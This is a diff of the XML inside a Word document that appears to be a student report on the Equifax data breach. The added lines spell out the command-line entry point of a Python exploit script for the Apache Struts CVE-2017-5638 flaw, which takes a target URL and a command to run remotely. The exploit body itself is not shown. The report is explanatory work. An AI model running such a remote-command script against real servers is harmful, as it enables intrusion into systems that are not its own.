+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>page</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>if</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>__name__ ==</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>'__main__':</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>    import</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>sys</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>    if</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>len(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>sys.argv</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>) !=</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>3:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>        </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>print(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>"[*] struts2_S2-045.py &lt;</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>url</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>&gt; &lt;</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>cmd</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>&gt;")</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>    else:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>        </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>print(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>'[*] CVE: 2017-5638 - Apache Struts2 S2-045')</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>        </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>url</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> =</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>sys.argv</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>[1]</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>        </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>cmd</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> =</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>sys.argv</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>[2]</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>        </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>print(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">"[*] </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>cmd</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>: %s\n"</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>%</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>cmd</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>        </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>exploit(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>url</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>cmd</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="100" w:afterAutospacing="1" w:line="264" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
           <w:sz w:val="24"/>
@@ -737,7 +4568,7 @@
       </w:pPr>
     </w:p>
     <w:sectPr>
-      <w:headerReference w:type="first" r:id="rId16"/>
+      <w:headerReference w:type="first" r:id="rId23"/>
       <w:pgSz w:w="12240" w:h="15840"/>
       <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="720" w:footer="720" w:gutter="0"/>
       <w:cols w:space="720"/>
@@ -863,17 +4694,20 @@
       <w:pStyle w:val="Header"/>
       <w:rPr>
         <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-        <w:sz w:val="24"/>
+        <w:b/>
+        <w:sz w:val="32"/>
       </w:rPr>
     </w:pPr>
     <w:r>
       <w:rPr>
         <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-        <w:sz w:val="24"/>
+        <w:b/>
+        <w:sz w:val="32"/>
       </w:rPr>
       <w:t>Joshua Gould – Equifax Report</w:t>
     </w:r>
   </w:p>
+  <w:p/>
 </w:hdr>
 </file>
 
@@ -1286,7 +5120,6 @@
   <w:style w:type="character" w:default="1" w:styleId="DefaultParagraphFont">
     <w:name w:val="Default Paragraph Font"/>
     <w:uiPriority w:val="1"/>
-    <w:semiHidden/>
     <w:unhideWhenUsed/>
   </w:style>
   <w:style w:type="table" w:default="1" w:styleId="TableNormal">
@@ -1474,6 +5307,50 @@
     <w:link w:val="Footer"/>
     <w:uiPriority w:val="99"/>
     <w:rsid w:val="00BB1E04"/>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="Caption">
+    <w:name w:val="caption"/>
+    <w:basedOn w:val="Normal"/>
+    <w:next w:val="Normal"/>
+    <w:uiPriority w:val="35"/>
+    <w:unhideWhenUsed/>
+    <w:qFormat/>
+    <w:rsid w:val="00927312"/>
+    <w:pPr>
+      <w:spacing w:after="200" w:line="240" w:lineRule="auto"/>
+    </w:pPr>
+    <w:rPr>
+      <w:i/>
+      <w:iCs/>
+      <w:color w:val="44546A" w:themeColor="text2"/>
+      <w:sz w:val="18"/>
+      <w:szCs w:val="18"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:styleId="HTMLCode">
+    <w:name w:val="HTML Code"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
+    <w:uiPriority w:val="99"/>
+    <w:semiHidden/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="000E4CC2"/>
+    <w:rPr>
+      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+      <w:sz w:val="20"/>
+      <w:szCs w:val="20"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:styleId="FollowedHyperlink">
+    <w:name w:val="FollowedHyperlink"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
+    <w:uiPriority w:val="99"/>
+    <w:semiHidden/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="00566573"/>
+    <w:rPr>
+      <w:color w:val="954F72" w:themeColor="followedHyperlink"/>
+      <w:u w:val="single"/>
+    </w:rPr>
   </w:style>
 </w:styles>
 </file>
@@ -1771,4 +5648,16 @@
     </a:ext>
   </a:extLst>
 </a:theme>
+</file>
+
+<file path=customXml/item1.xml><?xml version="1.0" encoding="utf-8"?>
+<b:Sources xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" SelectedStyle="\APASixthEditionOfficeOnline.xsl" StyleName="APA" Version="6"/>
+</file>
+
+<file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{C9FA5927-F244-43EF-8A06-B856103996ED}">
+  <ds:schemaRefs>
+    <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
+  </ds:schemaRefs>
+</ds:datastoreItem>
 </file>
--- a/_seniorI/CLINIC/Equifax Data Breach.docx
+++ b/_seniorI/CLINIC/Equifax Data Breach.docx
@@ -651,15 +651,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve"> involved </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>a</w:t>
+        <w:t xml:space="preserve"> involved a</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -675,23 +667,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>vulnerability with an</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> IT systems administrator using an insecure </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">password. </w:t>
+        <w:t xml:space="preserve">vulnerability with an IT systems administrator using an insecure password. </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1248,7 +1224,25 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve"> #cmd= string.</w:t>
+        <w:t xml:space="preserve"> #</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>cmd</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>= string.</w:t>
       </w:r>
       <w:r>
         <w:rPr>
